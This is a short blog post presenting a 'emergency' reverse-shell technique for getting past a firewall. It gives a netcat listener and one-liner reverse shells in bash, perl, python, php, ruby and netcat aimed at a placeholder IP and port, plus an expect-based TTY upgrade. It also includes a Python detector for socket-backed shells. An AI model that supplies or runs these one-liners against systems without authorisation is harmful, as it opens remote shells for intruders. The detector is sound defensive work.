Emergency reverse shell technique
18 Jun 2015 08:44 | security
Don’t you just hate it when an emergency happens with an important server and access from your location is firewalled? Luckily if there’s someone else local to the machine who can execute commands for you, getting onto it is fairly trivial.
First make sure that the machine you’re on can accept connections from the internet on a TCP port (any). Typically you’ll need to map this through on whatever firewall/router you’ve got on the local network.
Let’s say your IP address is 127.127.127.127 and you’ve mapped TCP port 13131. Simply listen on the port with netcat:
$ nc -l 13131
then have someone on the remote machine run any of these:
bash:
bash -i >& /dev/tcp/127.127.127.127/13131 0>&1
perl:
perl -e 'use Socket;$i="127.127.127.127";$p=13131;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
python:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.127.127.127",13131));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
php:
php -r '$sock=fsockopen("127.127.127.127",13131);exec("/bin/bash -i <&3 >&3 2>&3");'
ruby:
ruby -rsocket -e'f=TCPSocket.open("127.127.127.127",13131).to_i;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'
netcat:
nc -e /bin/bash 127.127.127.127 13131
and hey presto, your netcat listener is now connected to the shell. Of course the connection isn’t encrypted, so you’ll want to be careful what you type over it, but for emergency use it’s quite handy. The advantage over the obvious choice for this (ssh) is that you don’t have to give the person who’s at the server end any credentials to log into your machine with in order to set up the connection.
source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
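Every variant above leaves the same footprint on the server: a shell whose descriptors 0, 1 and 2 are a TCP socket instead of a pty, because each one-liner dups the socket onto stdin/stdout/stderr before exec’ing bash. The check below is an added example (not from the original post or from pentestmonkey) that an admin can run to spot such shells, whether they were started for an emergency like this or by someone uninvited; the process table it tests against is constructed inline, and the real /proc walk is Linux-only.

```python
import os
import re

SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}
SOCKET_RE = re.compile(r"socket:\[\d+\]")  # form of a socket link in /proc/<pid>/fd


def stdio_is_socket(fd_targets):
    """True when fds 0, 1 and 2 all resolve to a socket inode.

    fd_targets maps fd number -> readlink target of /proc/<pid>/fd/<fd>.
    A normal interactive shell points these at /dev/pts/N, a daemon at
    /dev/null; only a socket-backed shell has all three on a socket."""
    return all(SOCKET_RE.fullmatch(fd_targets.get(fd, "")) for fd in (0, 1, 2))


def find_socket_shells(procs):
    """procs: iterable of (pid, comm, fd_targets); returns matching pids.
    Note the expect trick in the Update gives the *inner* bash a pty, but
    the outer bash that received the socket still matches here."""
    return [pid for pid, comm, fds in procs if comm in SHELLS and stdio_is_socket(fds)]


def read_procs(root="/proc"):
    """Build (pid, comm, fd_targets) tuples from /proc; fd links of other
    users' processes are unreadable without root and are skipped."""
    procs = []
    for entry in os.listdir(root):
        if not entry.isdigit():
            continue
        try:
            with open(f"{root}/{entry}/comm") as f:
                comm = f.read().strip()
            fds = {fd: os.readlink(f"{root}/{entry}/fd/{fd}") for fd in (0, 1, 2)}
        except OSError:
            continue
        procs.append((int(entry), comm, fds))
    return procs


# Constructed sample modelled on what /proc shows after the one-liners above:
# 1001 is a normal login shell, 900 a daemon, 4242 the bash behind a socket,
# 4243 a server that legitimately has only its stdin on a socket.
SAMPLE_PROCS = [
    (1001, "bash", {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    (900, "sshd", {0: "/dev/null", 1: "/dev/null", 2: "/dev/null"}),
    (4242, "bash", {0: "socket:[20481]", 1: "socket:[20481]", 2: "socket:[20481]"}),
    (4243, "nginx", {0: "socket:[20482]", 1: "/dev/null", 2: "/dev/null"}),
]

if __name__ == "__main__":
    for pid in find_socket_shells(read_procs()):
        print(f"shell pid {pid} has stdin/stdout/stderr on a socket")
```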
Update
One limitation of this is that you won’t have a tty, which makes many things impossible or difficult.
However if expect is installed you can get one by dropping this into a file and running it:
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it. The new shell will
# have a good enough TTY to run tools like ssh, su and login
spawn bash
interact
then you have a full tty and can run sudo, su, screen etc :)
